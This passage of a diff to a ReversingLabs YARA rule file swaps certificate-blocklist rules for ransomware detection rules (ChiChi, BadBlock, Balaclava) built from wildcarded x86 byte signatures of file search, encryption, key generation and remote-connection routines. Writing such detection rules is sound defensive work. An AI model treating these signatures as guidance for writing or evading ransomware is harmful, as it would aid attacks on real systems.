+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ??
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ??
+            ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75
+            ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43
+        }
+		$encrypt_files_p4 = {
+            85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45
+            ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
+            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D
+        }
+		$encrypt_files_p5 = {
+            85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+        }
+		$encrypt_files_p6 = {
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ??
+            ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ??
+            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ??
+            ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ??
+            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            68
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVATON, s.r.o." and pe.signatures [ i ] . serial == "0e:6f:4c:b8:b0:6e:01:c3:bd:29:6a:ce:3a:95:f8:14" and 1603957781 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_085B70224253486624Fc36Fa658A1E32 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ChiChi ransomware."
 		author = "ReversingLabs"
-		id = "7d27604e-4ecd-559c-9180-4914e7f1f6c9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "95062789-a55d-5c1c-a359-206b58f311e5"
+		date = "2022-02-14"
+		modified = "2022-02-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6846-L6862"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "50ff48a421a109f8c6bf92032691d9b673945bc591005004ff17dc18c97d4aea"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ChiChi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$generate_key = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85
+            FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D
+            4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74
+            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6
+            74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ??
+            83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57
+            6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B
+            8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ??
+            ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$find_files = {
+            6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF
+            D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ??
+            56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
+            ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83
+            7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Best Fud, OOO" and pe.signatures [ i ] . serial == "08:5b:70:22:42:53:48:66:24:fc:36:fa:65:8a:1e:32" and 1597971601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_51Cd5393514F7Ace2B407C3Dbfb09D8D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BadBlock ransomware."
 		author = "ReversingLabs"
-		id = "ac86893f-2edd-5f1c-96eb-4cb140e8e001"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6864-L6880"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4cd08b9113a7c1f4f2d438ac59ad0be503daded3a08b8c8e8ce3e0dfdddf259e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BadBlock"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8
+            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ??
+            8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55
+            ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
+            ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50
+            E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20
+            6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ??
+            ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B
+            45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B D8 8B C3
+            E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF
+            12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58
+            7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ??
+            8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ??
+            8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ??
+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
+            EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$search_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
+            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66
+            83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ??
+            43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF
+            57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
+            8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF
+            51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 6A ?? 8D 45 ?? 50 8D 4D ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4D ??
+            8B 45 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            74 ?? C7 45 ?? ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 83 EB ?? 8B 1B 68 ?? ?? ?? ?? 8B CB
+            BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8D 45
+            ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 45
+            ?? 8B 90 ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 68 ?? ?? ?? ?? 8B CE BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APPI CZ a.s" and pe.signatures [ i ] . serial == "51:cd:53:93:51:4f:7a:ce:2b:40:7c:3d:bf:b0:9d:8d" and 1605299467 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files and $encrypt_files and $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B72179C027B9037Ee220E81Ab18Fe56D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Balaclava ransomware."
 		author = "ReversingLabs"
-		id = "85639e74-80b0-59c6-b31b-5b3d9587b37a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869"
+		date = "2020-10-01"
+		modified = "2020-10-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6882-L6900"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1416768011ff824307d112bdeecce1ad50d1f673e92bef8fddbbeb58ff98b1b1"
